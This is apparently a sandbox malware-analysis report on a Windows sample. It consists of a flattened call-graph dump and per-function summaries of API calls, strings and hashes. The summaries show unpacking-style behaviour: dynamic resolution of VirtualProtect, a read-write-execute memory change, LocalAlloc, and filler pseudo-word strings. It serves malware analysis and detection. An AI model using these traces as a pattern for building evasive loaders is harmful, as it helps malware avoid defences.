8029->8031 8030->8022 8039 b36430 8031->8039 8086 b3a310 8039->8086 8042 b3644b 8044 b364d0 __NMSG_WRITE 31 API calls 8042->8044 8046 b36472 8042->8046 8043 b3a310 __set_error_mode 11 API calls 8043->8042 8045 b36465 8044->8045 8047 b364d0 __NMSG_WRITE 31 API calls 8045->8047 8048 b364d0 8046->8048 8047->8046 8054 b364ee __GET_RTERRMSG 8048->8054 8049 b36616 8050 b3a1a0 ___crtMessageWindowW 5 API calls 8049->8050 8051 b367fd 8050->8051 8083 b328a0 8051->8083 8052 b3a310 
__set_error_mode 11 API calls 8053 b3656d 8052->8053 8055 b36594 GetStdHandle 8053->8055 8056 b3a310 __set_error_mode 11 API calls 8053->8056 8054->8049 8054->8052 8055->8049 8059 b365a5 _strlen 8055->8059 8057 b3657c 8056->8057 8057->8055 8058 b3661b 8057->8058 8058->8049 8060 b38980 _wcscpy_s 11 API calls 8058->8060 8059->8049 8061 b36601 WriteFile 8059->8061 8062 b36682 8060->8062 8061->8049 8063 b32e70 __invoke_watson_if_error 10 API calls 8062->8063 8064 b3668b GetModuleFileNameW 8063->8064 8065 b366b5 8064->8065 8070 b366ec _wcslen 8064->8070 8066 b38980 _wcscpy_s 11 API calls 8065->8066 8067 b366e3 8066->8067 8068 b32e70 __invoke_watson_if_error 10 API calls 8067->8068 8068->8070 8069 b3676e 8100 b3a5f0 8069->8100 8070->8069 8090 b3a9e0 8070->8090 8072 b3679b 8073 b32e70 __invoke_watson_if_error 10 API calls 8072->8073 8075 b367a4 8073->8075 8077 b3a5f0 _wcscat_s 11 API calls 8075->8077 8076 b36765 8078 b32e70 __invoke_watson_if_error 10 API calls 8076->8078 8079 b367d0 8077->8079 8078->8069 8080 b32e70 __invoke_watson_if_error 10 API calls 8079->8080 8081 b367d9 8080->8081 8113 b3a3d0 8081->8113 8131 b32860 GetModuleHandleW 8083->8131 8087 b3a32b 8086->8087 8088 b381d0 __invalid_parameter 11 API calls 8087->8088 8089 b3643c 8087->8089 8088->8089 8089->8042 8089->8043 8091 b3a9ee 8090->8091 8092 b3aa4d 8091->8092 8095 b3aa7d _memset 8091->8095 8097 b3a9fa _memset 8091->8097 8093 b381d0 __invalid_parameter 11 API calls 8092->8093 8093->8097 8094 b3ab7b 8096 b381d0 __invalid_parameter 11 API calls 8094->8096 8095->8094 8095->8097 8098 b3abab _memset _wcsncpy_s 8095->8098 8096->8097 8097->8076 8098->8097 8099 b381d0 __invalid_parameter 11 API calls 8098->8099 8099->8097 8102 b3a5fe 8100->8102 8101 b3a644 8103 b381d0 __invalid_parameter 11 API calls 8101->8103 8102->8101 8105 b3a674 _memset 8102->8105 8108 b3a667 _memset 8103->8108 8104 b3a70d 8106 b381d0 __invalid_parameter 11 API calls 8104->8106 8105->8104 8107 b3a73d _memset 8105->8107 8106->8108 8109 b3a81d 
8107->8109 8111 b3a84d _memset 8107->8111 8108->8072 8110 b381d0 __invalid_parameter 11 API calls 8109->8110 8110->8108 8111->8108 8112 b381d0 __invalid_parameter 11 API calls 8111->8112 8112->8108 8114 b35ad0 FindHandlerForForeignException RtlEncodePointer 8113->8114 8115 b3a3ee 8114->8115 8116 b3a413 LoadLibraryW 8115->8116 8117 b3a4d7 8115->8117 8118 b3a42e GetProcAddress 8116->8118 8127 b3a427 8116->8127 8121 b3a4ed DecodePointer DecodePointer 8117->8121 8130 b3a512 8117->8130 8119 b3a44d 7 API calls 8118->8119 8118->8127 8119->8117 8124 b3a4bc GetProcAddress EncodePointer 8119->8124 8120 b3a550 8122 b3a5b4 DecodePointer 8120->8122 8121->8130 8122->8127 8123 b3a1a0 ___crtMessageWindowW 5 API calls 8128 b3a5ec 8123->8128 8124->8117 8125 b3a57e 8125->8122 8129 b3a594 DecodePointer 8125->8129 8126 b3a568 DecodePointer 8126->8125 8127->8123 8128->8049 8129->8120 8129->8122 8130->8120 8130->8125 8130->8126 8132 b32894 ExitProcess 8131->8132 8133 b3287c GetProcAddress 8131->8133 8133->8132 8135 b396e8 8134->8135 8135->8012 8135->8013 8136->7989 8140 b37dc0 LeaveCriticalSection 8137->8140 8139 b328ec 8139->7911 8140->8139 9183 b3e7d0 9184 b3e80e 9183->9184 9188 b3e842 9183->9188 9185 b39e20 __updatetlocinfoEx_nolock 16 API calls 9184->9185 9186 b3e82e 9185->9186 9189 b3e844 9186->9189 9192 b37dc0 LeaveCriticalSection 9189->9192 9191 b3e84b 9191->9188 9192->9191 8760 b3cd50 IsProcessorFeaturePresent 9130 b353d0 9131 b353eb __chvalidator_l 9130->9131 9134 b35530 9131->9134 9133 b353fd _LocaleUpdate::~_LocaleUpdate 9137 b35570 __CrtIsValidHeapPointer 9134->9137 9136 b357f8 9136->9133 9138 b3562f IsBadReadPtr 9137->9138 9139 b35642 9137->9139 9149 b3560a 9137->9149 9138->9139 9140 b35749 9139->9140 9143 b356c6 9139->9143 9141 b35752 9140->9141 9142 b3578d 9140->9142 9146 b35840 _CrtMemDumpAllObjectsSince_stat 43 API calls 9141->9146 9148 b35840 _CrtMemDumpAllObjectsSince_stat 43 API calls 9142->9148 9142->9149 9144 b35734 9143->9144 9145 b35708 IsBadReadPtr 9143->9145 
9150 b35840 9144->9150 9145->9144 9145->9149 9146->9149 9148->9149 9160 b357fa 9149->9160 9153 b3585e __chvalidator_l 9150->9153 9151 b3598b _LocaleUpdate::~_LocaleUpdate 9152 b3a1a0 ___crtMessageWindowW 5 API calls 9151->9152 9154 b359da 9152->9154 9153->9151 9156 b358da __chvalidator_l 9153->9156 9163 b3a080 9153->9163 9154->9149 9167 b39f70 9156->9167 9158 b3595d 9158->9151 9159 b359e0 __invoke_watson_if_oneof 10 API calls 9158->9159 9159->9151 9182 b37dc0 LeaveCriticalSection 9160->9182 9162 b35801 9162->9136 9164 b3a094 __chvalidator_l __isleadbyte_l 9163->9164 9165 b3b770 ___crtLCMapStringW 3 API calls 9164->9165 9166 b3a0a3 _LocaleUpdate::~_LocaleUpdate __chvalidator_l 9164->9166 9165->9166 9166->9156 9170 b3e120 9167->9170 9169 b39f93 9169->9158 9171 b3e141 9170->9171 9172 b3e168 9171->9172 9174 b3e199 9171->9174 9173 b381d0 __invalid_parameter 11 API calls 9172->9173 9179 b3e18e _memset 9173->9179 9175 b3e219 9174->9175 9176 b3e1e8 9174->9176 9177 b3df30 __vsnprintf_helper 40 API calls 9175->9177 9178 b381d0 __invalid_parameter 11 API calls 9176->9178 9180 b3e237 _memset 9177->9180 9178->9179 9179->9169 9180->9179 9181 b381d0 __invalid_parameter 11 API calls 9180->9181 9181->9179 9182->9162 9085 b322d0 SetUnhandledExceptionFilter 8686 b459d0 8687 b45a25 8686->8687 8688 b45ab4 8687->8688 8689 b45a6e 8687->8689 8690 b45af6 8688->8690 8705 b45b3c _get_int_arg __chvalidator_l _strlen __isleadbyte_l 8688->8705 8691 b381d0 __invalid_parameter 11 API calls 8689->8691 8692 b381d0 __invalid_parameter 11 API calls 8690->8692 8694 b45a94 _LocaleUpdate::~_LocaleUpdate 8691->8694 8692->8694 8693 b3a1a0 ___crtMessageWindowW 5 API calls 8696 b46ab8 8693->8696 8694->8693 8695 b469ea 8695->8694 8697 b381d0 __invalid_parameter 11 API calls 8695->8697 8697->8694 8698 b45c64 8699 b381d0 __invalid_parameter 11 API calls 8698->8699 8699->8694 8700 b4640c DecodePointer 8700->8705 8701 b46c60 42 API calls _write_string 8701->8705 8702 b46456 DecodePointer 8702->8705 8703 b46c20 
42 API calls _write_multi_char 8703->8705 8704 b4648c DecodePointer 8704->8705 8705->8695 8705->8698 8705->8700 8705->8701 8705->8702 8705->8703 8705->8704 8706 b46d20 MultiByteToWideChar MultiByteToWideChar __mbtowc_l 8705->8706 8707 b46bc0 42 API calls _write_char 8705->8707 8706->8705 8707->8705 8366 b28458 8367 b28461 8366->8367 8368 b29790 8367->8368 8371 b28310 8367->8371 8372 b28338 8371->8372 8373 b2831f 8371->8373 8373->8372 8374 b28328 ResetEvent CloseEventLog 8373->8374 8374->8372 8162 b29d5e LocalAlloc 8163 b2b00f 8162->8163 8163->8163 9303 b28340 9304 b2837f 7 API calls 9303->9304 9306 b28418 9303->9306 9304->9306 9305 b29790 9306->9305 9307 b28310 2 API calls 9306->9307 9308 b28472 9307->9308 8149 b33340 GetStartupInfoW 8150 b33367 8149->8150 8151 b335ff 8150->8151 8159 b33373 8150->8159 8160 b3359f InitializeCriticalSectionAndSpinCount 8150->8160 8161 b3358f GetFileType 8150->8161 8152 b3373c SetHandleCount 8151->8152 8153 b33664 GetStdHandle 8151->8153 8155 b336f9 8151->8155 8152->8159 8154 b3367b 8153->8154 8153->8155 8154->8155 8156 b33685 GetFileType 8154->8156 8155->8152 8156->8155 8157 b33698 InitializeCriticalSectionAndSpinCount 8156->8157 8157->8155 8157->8159 8160->8150 8160->8159 8161->8150 8161->8160 8141 b31fc0 8144 b322f0 8141->8144 8143 b31fca 8145 b32312 8144->8145 8146 b32331 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 8144->8146 8145->8146 8147 b3231e 8145->8147 8148 b32393 8146->8148 8147->8143 8148->8147 9110 b3a240 9111 b3a252 9110->9111 9112 b3a260 @_EH4_CallFilterFunc@8 9110->9112 9113 b3a1a0 ___crtMessageWindowW 5 API calls 9111->9113 9113->9112 8708 b321c0 8709 b321d3 8708->8709 8710 b321ce 8708->8710 8712 b364d0 __NMSG_WRITE 31 API calls 8709->8712 8711 b36430 __FF_MSGBANNER 31 API calls 8710->8711 8711->8709 8713 b321dc 8712->8713 8714 b328a0 __heap_alloc_base 3 API calls 8713->8714 8715 b321e9 8714->8715 8761 b3f140 8764 b453e0 8761->8764 8767 b45420 8764->8767 8768 
b3f155 8767->8768 8769 b45431 std::exception::_Tidy 8767->8769 8769->8768 8770 b454c0 std::exception::_Copy_str 11 API calls 8769->8770 8770->8768 8771 b35d40 8772 b35d4e DecodePointer 8771->8772 8773 b35d63 8771->8773 8772->8773 8774 b35d76 TlsFree 8773->8774 8775 b35d8d 8773->8775 8774->8775 8778 b37b70 8775->8778 8779 b37b81 8778->8779 8781 b37baa DeleteCriticalSection 8779->8781 8782 b37bdf 8779->8782 8780 b35d92 8781->8779 8782->8780 8783 b37c11 DeleteCriticalSection 8782->8783 8783->8782 9193 b35fc0 9194 b36002 9193->9194 9202 b36193 9193->9202 9195 b360f5 InterlockedDecrement 9194->9195 9196 b36103 9194->9196 9195->9196 9203 b36128 9196->9203 9198 b36126 9199 b3615c ___freetlocinfo 9198->9199 9200 b39a10 ___removelocaleref 8 API calls 9198->9200 9206 b36195 9199->9206 9200->9199 9209 b37dc0 LeaveCriticalSection 9203->9209 9205 b3612f 9205->9198 9210 b37dc0 LeaveCriticalSection 9206->9210 9208 b3619c 9208->9202 9209->9205 9210->9208 8784 b43540 8789 b47880 8784->8789 8787 b4355a 8799 b478a0 8789->8799 8792 b47630 8798 b47670 8792->8798 8793 b4772a 8875 b47738 8793->8875 8797 b476e8 DeleteCriticalSection 8797->8798 8798->8793 8798->8797 8864 b47ea0 8798->8864 8800 b478e7 8799->8800 8809 b479e5 8800->8809 8812 b435d0 8800->8812 8804 b47954 8805 b4799f 8804->8805 8806 b4797a 8804->8806 8811 b4798c 8804->8811 8810 b47760 __fflush_nolock 44 API calls 8805->8810 8805->8811 8815 b47760 8806->8815 8828 b47a14 8809->8828 8810->8811 8825 b479e7 8811->8825 8813 b435fe EnterCriticalSection 8812->8813 8814 b435db 8812->8814 8813->8814 8814->8804 8816 b47777 8815->8816 8817 b4776b 8815->8817 8831 b477c0 8816->8831 8819 b478a0 __fflush_nolock 44 API calls 8817->8819 8824 b47772 8819->8824 8821 b436b0 __fileno 11 API calls 8822 b477a3 8821->8822 8837 b480b0 8822->8837 8824->8811 8857 b43670 8825->8857 8863 b37dc0 LeaveCriticalSection 8828->8863 8830 b4354a 8830->8787 8830->8792 8832 b477e3 8831->8832 8836 b47780 8831->8836 8833 b436b0 __fileno 11 API calls 8832->8833 
8832->8836 8834 b47819 8833->8834 8835 b424e0 __write 40 API calls 8834->8835 8835->8836 8836->8821 8836->8824 8838 b480fb 8837->8838 8846 b480e8 8837->8846 8839 b4814c 8838->8839 8840 b4817a 8838->8840 8844 b381d0 __invalid_parameter 11 API calls 8839->8844 8841 b481f5 8840->8841 8842 b481c7 8840->8842 8843 b474b0 ___lock_fhandle 3 API calls 8841->8843 8847 b381d0 __invalid_parameter 11 API calls 8842->8847 8845 b481fe 8843->8845 8844->8846 8848 b47340 __get_osfhandle 11 API calls 8845->8848 8852 b4824a __close 8845->8852 8846->8824 8847->8846 8849 b48231 FlushFileBuffers 8848->8849 8850 b4823f GetLastError 8849->8850 8849->8852 8850->8852 8853 b482a5 8852->8853 8856 b475b0 LeaveCriticalSection 8853->8856 8855 b482ae 8855->8846 8856->8855 8858 b4369e LeaveCriticalSection 8857->8858 8859 b4367b 8857->8859 8860 b43699 8858->8860 8862 b37dc0 LeaveCriticalSection 8859->8862 8860->8809 8862->8860 8863->8830 8865 b47eeb 8864->8865 8866 b47f0f 8865->8866 8867 b47f3a 8865->8867 8871 b381d0 __invalid_parameter 11 API calls 8866->8871 8868 b47f32 8867->8868 8878 b43570 8867->8878 8868->8798 8870 b47f5a 8882 b47fb0 8870->8882 8871->8868 8873 b47f6d 8893 b47f81 8873->8893 8942 b37dc0 LeaveCriticalSection 8875->8942 8877 b47736 8877->8787 8879 b435b2 EnterCriticalSection 8878->8879 8880 b4357e 8878->8880 8881 b43587 8879->8881 8880->8879 8880->8881 8881->8870 8885 b47fd1 8882->8885 8883 b47ff5 8887 b381d0 __invalid_parameter 11 API calls 8883->8887 8884 b48023 8886 b477c0 __flush 40 API calls 8884->8886 8892 b48018 8884->8892 8885->8883 8885->8884 8888 b48040 __freebuf 8886->8888 8887->8892 8889 b436b0 __fileno 11 API calls 8888->8889 8890 b4805b 8889->8890 8896 b48340 8890->8896 8892->8873 8935 b43610 8893->8935 8897 b48396 8896->8897 8909 b48378 __close 8896->8909 8898 b48420 8897->8898 8900 b483e7 __close 8897->8900 8899 b484a6 8898->8899 8903 b4846d __close 8898->8903 8901 b474b0 ___lock_fhandle 3 API calls 8899->8901 8904 b381d0 __invalid_parameter 11 API calls 8900->8904 
8902 b484af 8901->8902 8905 b484e2 8902->8905 8910 b48550 8902->8910 8907 b381d0 __invalid_parameter 11 API calls 8903->8907 8904->8909 8923 b4852c 8905->8923 8907->8909 8909->8892 8911 b47340 __get_osfhandle 11 API calls 8910->8911 8914 b48560 8911->8914 8912 b485c5 8926 b47250 8912->8926 8914->8912 8915 b485a7 8914->8915 8916 b47340 __get_osfhandle 11 API calls 8914->8916 8915->8912 8917 b47340 __get_osfhandle 11 API calls 8915->8917 8918 b4859b 8916->8918 8919 b485b7 CloseHandle 8917->8919 8920 b47340 __get_osfhandle 11 API calls 8918->8920 8919->8912 8921 b485ce GetLastError 8919->8921 8920->8915 8921->8912 8922 b485e0 __dosmaperr 8922->8905 8934 b475b0 LeaveCriticalSection 8923->8934 8925 b48535 8925->8909 8927 b47260 8926->8927 8932 b472d0 __close 8926->8932 8928 b472c4 8927->8928 8929 b472d2 SetStdHandle 8927->8929 8927->8932 8930 b472de SetStdHandle 8928->8930 8931 b472ca 8928->8931 8929->8932 8930->8932 8931->8932 8933 b472ea SetStdHandle 8931->8933 8932->8922 8933->8932 8934->8925 8936 b43652 LeaveCriticalSection 8935->8936 8937 b4361e 8935->8937 8939 b4364d 8936->8939 8937->8936 8938 b43627 8937->8938 8941 b37dc0 LeaveCriticalSection 8938->8941 8939->8868 8941->8939 8942->8877

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 b31e90-b31ee4 1 b31ef2-b31f3f 0->1 2 b31ee6-b31ef0 0->2 4 b31f9a-b31fad LoadLibraryW Sleep call b306f0 1->4 2->1 3 b31f41-b31f93 2->3 3->4 6 b31fb2-b31fb7 4->6
                                                            APIs
                                                            • LoadLibraryW.KERNELBASE(msimg32.dll), ref: 00B31F9F
                                                            • Sleep.KERNELBASE(0000000F), ref: 00B31FA7
                                                            Strings
                                                            • Tofoc, xrefs: 00B31F8C
                                                            • Kadiquap yak yapese gicihe caf wokatixa, xrefs: 00B31EF9
                                                            • Lopaga boko totin quovite nat nijati caxebi, xrefs: 00B31F1F
                                                            • Taveni wekaw nedowogi toh ketelo yiyero bopix nig lexakesi, xrefs: 00B31EC3
                                                            • msimg32.dll, xrefs: 00B31F9A
                                                            • Saqua xogakoga hitomigi baq ridihi xiwik gon, xrefs: 00B31F78
                                                            • Kewiwali tineq hoki kahe quo xexiqua, xrefs: 00B31EF2
                                                            • Golimafo nedofa cej goy koci woben tikavi, xrefs: 00B31F93
                                                            • Yoka kalex jeh goror, xrefs: 00B31EBC
                                                            • Menif dina lebi tijijebi docoye delivev rotoxor halofa fijac, xrefs: 00B31ED3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoadSleep
                                                            • String ID: Golimafo nedofa cej goy koci woben tikavi$Kadiquap yak yapese gicihe caf wokatixa$Kewiwali tineq hoki kahe quo xexiqua$Lopaga boko totin quovite nat nijati caxebi$Menif dina lebi tijijebi docoye delivev rotoxor halofa fijac$Saqua xogakoga hitomigi baq ridihi xiwik gon$Taveni wekaw nedowogi toh ketelo yiyero bopix nig lexakesi$Tofoc$Yoka kalex jeh goror$msimg32.dll
                                                            • API String ID: 2118945035-2037848005
                                                            • Opcode ID: 2d531f41cbf00890d6c32676c86e4372f5b2ba4d7de6a79e3e7c507f4828d0c6
                                                            • Instruction ID: 8be7f4e9892d54e6f3be1c1e3298dd7b339f3118e3c11037615d587dfd61950a
                                                            • Opcode Fuzzy Hash: 2d531f41cbf00890d6c32676c86e4372f5b2ba4d7de6a79e3e7c507f4828d0c6
                                                            • Instruction Fuzzy Hash: 3D315E70C19259CADB00DFE8D5492EFBBF0EF54305F1094A8D108BB291EBB90B84CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 7 b2f410-b2f454 GetProcAddress 8 b2f45a-b304ad 7->8 9 b30679-b30683 7->9 8->9 11 b30685-b306a8 9->11 12 b306aa-b306c8 9->12 13 b306cf-b306e5 VirtualProtect call b2ddf0 11->13 12->13 16 b306ea-b306ed 13->16
                                                            APIs
                                                            • GetProcAddress.KERNEL32(761A0000,VirtualProtect), ref: 00B2F445
                                                            • VirtualProtect.KERNELBASE(00B48720,000E93B5,00000040,?), ref: 00B306DF
                                                            Strings
                                                            • Hiheb binihoye powisaw xobi, xrefs: 00B2F42E
                                                            • Joj jegal diq ritigipe debaw wovireko fitati sojofi hox wayi getog, xrefs: 00B30685
                                                            • Balafe nod, xrefs: 00B2F423
                                                            • Rexobey famiwi gope hipofaxa hac, xrefs: 00B306C8
                                                            • Tedojade noverore ceyoho wiy xafela xit canav, xrefs: 00B306B6
                                                            • VirtualProtect, xrefs: 00B2F439
                                                            • Vaqueweh, xrefs: 00B3069D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: AddressProcProtectVirtual
                                                            • String ID: Balafe nod$Hiheb binihoye powisaw xobi$Joj jegal diq ritigipe debaw wovireko fitati sojofi hox wayi getog$Rexobey famiwi gope hipofaxa hac$Tedojade noverore ceyoho wiy xafela xit canav$Vaqueweh$VirtualProtect
                                                            • API String ID: 3759838892-90842377
                                                            • Opcode ID: 6f76c6339b18d24ff75cfa1c39efb4014c15e6aba3997f1034590ba370f24ec7
                                                            • Instruction ID: fc90655ef2fef0d7006b26cb382d8c88827f5d3e77514dcd34382535c1dd6395
                                                            • Opcode Fuzzy Hash: 6f76c6339b18d24ff75cfa1c39efb4014c15e6aba3997f1034590ba370f24ec7
                                                            • Instruction Fuzzy Hash: 0C219F70818298DAEB01EBA8E8497AEBEF5AF11308F1040C8D4047B291D7F50A58D7AA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 17 b2caf0-b2cb30 call b282c0 GetProcAddress LocalFree 20 b2cfc5 17->20 21 b2d42f 20->21 21->21
                                                            APIs
                                                            • GetProcAddress.KERNEL32(761A0000,LocalFree), ref: 00B2CB18
                                                            • LocalFree.KERNELBASE(02744020), ref: 00B2CB2A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeLocalProc
                                                            • String ID: LocalFree
                                                            • API String ID: 1054450353-1040775051
                                                            • Opcode ID: 53ec078022ad4b0c9a5d95bf003f078a60412de83b663496f1eead183f36e0f0
                                                            • Instruction ID: 8d58d4c4990a917baa7944eb260501569aff8190ddbe6340a9c8558d6d63c01f
                                                            • Opcode Fuzzy Hash: 53ec078022ad4b0c9a5d95bf003f078a60412de83b663496f1eead183f36e0f0
                                                            • Instruction Fuzzy Hash: 71E00AB1126210EB861CDBA9FC85F6E3BEDB7487407255559B20AC3261CF34B8409B65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 22 b35ad0-b35ade RtlEncodePointer
                                                            APIs
                                                            • RtlEncodePointer.NTDLL(00000000,?,00B3290B,?,?,00B35C40), ref: 00B35AD7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer
                                                            • String ID:
                                                            • API String ID: 2118026453-0
                                                            • Opcode ID: 89a2a8d3bdd4108df50ebd0492a4838b26ef67c03faf6578c2a82e9aac1c69e1
                                                            • Instruction ID: 49323de22ac96c4490940e90956eb030d743b2a89d20cace940da571e81a3ced
                                                            • Opcode Fuzzy Hash: 89a2a8d3bdd4108df50ebd0492a4838b26ef67c03faf6578c2a82e9aac1c69e1
                                                            • Instruction Fuzzy Hash: E9A0123104424C63C21016966809B523A0CC3C0A32F000011F10C021404D5154414055
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 23 b31fc0-b31fc5 call b322f0 25 b31fca call b32000 23->25
                                                            APIs
                                                            • ___security_init_cookie.LIBCMTD ref: 00B31FC5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: ___security_init_cookie
                                                            • String ID:
                                                            • API String ID: 3657697845-0
                                                            • Opcode ID: 10aa842220d1ae97c82873596692f60cc5af0d811702c0041fe5b51822d43d2c
                                                            • Instruction ID: cd9c6fa5229b7b2913188b7eee77e83e6a0bc4f56e751db1b896e957bdbe840c
                                                            • Opcode Fuzzy Hash: 10aa842220d1ae97c82873596692f60cc5af0d811702c0041fe5b51822d43d2c
                                                            • Instruction Fuzzy Hash: BBA0027100464826116833A60D17A1B75CE49C1710FB540907518021071C64A94590A6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 27 b297e6-b297eb 28 b29818-b29829 27->28 29 b297ed-b297f7 27->29 32 b298c1 28->32 33 b29d64-b29d73 LocalAlloc 28->33 30 b297fa-b299a7 29->30 31 b2977d-b29782 29->31 41 b29bf3 30->41 34 b29784-b297af 31->34 35 b2970f-b29711 31->35 38 b29b47 32->38 37 b2b00f 33->37 34->32 35->31 37->37 41->41
                                                            APIs
                                                            • LocalAlloc.KERNELBASE(00000040,?), ref: 00B29D6A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: AllocLocal
                                                            • String ID:
                                                            • API String ID: 3494564517-0
                                                            • Opcode ID: 12759f8a02a33d999778be81645607cd66a46a60ac0140e5043cb831fd0ea93d
                                                            • Instruction ID: cf4ae3afe581e2d623e533a8764e55a205607107633e6d00084e0aad754c8592
                                                            • Opcode Fuzzy Hash: 12759f8a02a33d999778be81645607cd66a46a60ac0140e5043cb831fd0ea93d
                                                            • Instruction Fuzzy Hash: 7501BD3080C276E7C7158B18F8C9AB27FE8DB02360F2003D9E5AEAF595D3302505A312
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 42 b2980d-b29d73 LocalAlloc 44 b2b00f 42->44 44->44
                                                            APIs
                                                            • LocalAlloc.KERNELBASE(00000040,?), ref: 00B29D6A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
